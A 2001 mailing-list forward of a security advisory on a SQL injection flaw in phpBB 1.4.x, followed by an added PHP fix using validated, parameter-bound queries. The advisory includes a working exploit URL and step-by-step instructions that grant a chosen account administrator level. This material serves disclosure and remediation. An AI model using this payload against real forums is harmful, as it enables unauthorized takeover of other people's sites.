From: Steve (stevesecuresolutions.org)
Date: Fri Aug 03 2001 - 19:00:17 CDT


    -----Original Message-----
    From: kill-9modernhackers.com [mailto:kill-9modernhackers.com]
    Subject: phpBB 1.4.0 bug leads to easy admin privileges

    -New phpBB 1.4.x exploit
    phpBB is an open source bulletin board created by the
    phpBB group. Version 1.4.x of phpBB has a variable input
    validation problem that can lead to limited arbitrary SQL
    queries, including gaining administrative access to the
    board.

    The problem lies in the fact that phpBB 1.4.x includes an
    algorithm in the auth.php file which removes backslashes
    that PHP automatically adds to GPC (Get/Post/Cookie)
    variables.

    <Example code from auth.php>

    if(get_magic_quotes_gpc() == 1)
    {
       switch($REQUEST_METHOD){
          case "POST":
             // Walk every POST variable, undo the backslashes that
             // magic_quotes_gpc added, and register the result as a
             // global variable ($$key) under the submitted name.
             while (list ($key, $val) = each ($HTTP_POST_VARS)){
                if( is_array($val) ){
                   // stripslashes_array() is a phpBB helper defined elsewhere in auth.php
                   array_walk($val, 'stripslashes_array', '');
                   $$key = $val;
                }
                else{
                   $$key = stripslashes($val);
                }
             }
          break;
          // further cases are omitted from this excerpt
       }
    }

    </ End example code>

    Therefore, certain PHP variables submitted through a URL
    can reach an SQL query with unescaped quotes, which is
    not good for security reasons. In the prefs.php file such
    a situation exists where a user can execute an arbitrary
    query by supplying a certain value for the $viewemail
    variable.

    < Example sql query in prefs.php >
    $sql = "UPDATE users SET user_viewemail='$viewemail',
            user_theme='$themes', user_attachsig = '$sig',
            user_desmile = '$smile', user_html = '$dishtml',
            user_bbcode = '$disbbcode', user_lang = '$lang'
            WHERE (user_id = '$userdata[user_id]')";
    </ End example code >

    The example URL gives the username "l337h4x0r" level 4
    (administrative) privileges on the board:

    <Example URL>

    http://sitename/phpBBfolder/prefs.php?save=1
    &viewemail=1',user_level%3D'4'%20where%
    20username%3D'l337h4x0r'%23

    </ End example URL>

    Summary:

    1. Register an account on a phpBB board version 1.4.x.
    2. Enter the above URL with the correct sitename
       and replace l337h4x0r with your username.
    3. Click on "Administration Panel" near the bottom of
       the page.

    found by: kill-9modernhacker.com
    http://www.modernhacker.com
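Added example (editor's code, not phpBB's and not the advisory author's): the prefs.php UPDATE from the advisory rebuilt so that $viewemail and the other preference values are validated and bound as query parameters instead of being interpolated into the SQL text. This is the fix for both parts of the problem described above: it no longer matters whether auth.php strips the magic_quotes backslashes, because the values never become SQL. It assumes PHP with PDO and the pdo_sqlite driver; the in-memory table, its columns (named after the advisory's query), the sample user row and the helper function names are constructed here for the demonstration only.

```php
<?php
// Constructed demo database: an in-memory SQLite table with the columns the
// advisory's UPDATE touches plus username and user_level, and one ordinary
// (level 1) user. Not phpBB's real schema.
function open_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (
        user_id INTEGER PRIMARY KEY, username TEXT, user_level INTEGER,
        user_viewemail INTEGER, user_theme INTEGER, user_attachsig INTEGER,
        user_desmile INTEGER, user_html INTEGER, user_bbcode INTEGER,
        user_lang TEXT)');
    $db->exec("INSERT INTO users VALUES (7, 'someuser', 1, 0, 1, 0, 0, 0, 0, 'english')");
    return $db;
}

// On/off preferences: accept only the literal 0 or 1 (string or int) and
// reject everything else before any SQL is built.
function flag_value(array $input, string $name): int
{
    $v = $input[$name] ?? '0';
    if (!in_array($v, ['0', '1', 0, 1], true)) {
        throw new InvalidArgumentException("invalid value for $name");
    }
    return (int) $v;
}

// Hypothetical replacement for the prefs.php save path: every value is
// validated, then bound by name to a prepared statement.
function save_prefs(PDO $db, int $user_id, array $input): int
{
    $theme = filter_var($input['themes'] ?? 1, FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 1]]);
    $lang  = (string) ($input['lang'] ?? 'english');
    if ($theme === false || !preg_match('/^[a-z_]{1,32}$/', $lang)) {
        throw new InvalidArgumentException('invalid theme or language');
    }
    $params = [
        ':viewemail' => flag_value($input, 'viewemail'),
        ':sig'       => flag_value($input, 'sig'),
        ':smile'     => flag_value($input, 'smile'),
        ':dishtml'   => flag_value($input, 'dishtml'),
        ':disbbcode' => flag_value($input, 'disbbcode'),
        ':theme'     => $theme,
        ':lang'      => $lang,
        ':user_id'   => $user_id,
    ];
    $stmt = $db->prepare(
        'UPDATE users SET user_viewemail = :viewemail, user_theme = :theme, '
      . 'user_attachsig = :sig, user_desmile = :smile, user_html = :dishtml, '
      . 'user_bbcode = :disbbcode, user_lang = :lang WHERE user_id = :user_id'
    );
    $stmt->execute($params);
    return $stmt->rowCount();
}

// Demonstration: the advisory's style of viewemail value is rejected before
// any query runs, so user_level stays at 1; a normal value still saves.
$db = open_demo_db();
$hostile = ['viewemail' => "1',user_level='4' where username='someuser'#"];
try {
    save_prefs($db, 7, $hostile);
    echo "unexpected: hostile input accepted\n";
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
save_prefs($db, 7, ['viewemail' => '1', 'themes' => '2', 'lang' => 'english']);
$row = $db->query('SELECT user_level, user_viewemail FROM users WHERE user_id = 7')
          ->fetch(PDO::FETCH_ASSOC);
echo "user_level={$row['user_level']} user_viewemail={$row['user_viewemail']}\n";
```

Two design points: the validation functions reject rather than "clean" bad input, so a value that is not a preference at all (the injected one above) never reaches the database in any form, and the WHERE clause is fixed to the authenticated user's id rather than anything the request can influence, which is what closes the path from a preference save to a privilege change even if some other value were to slip through.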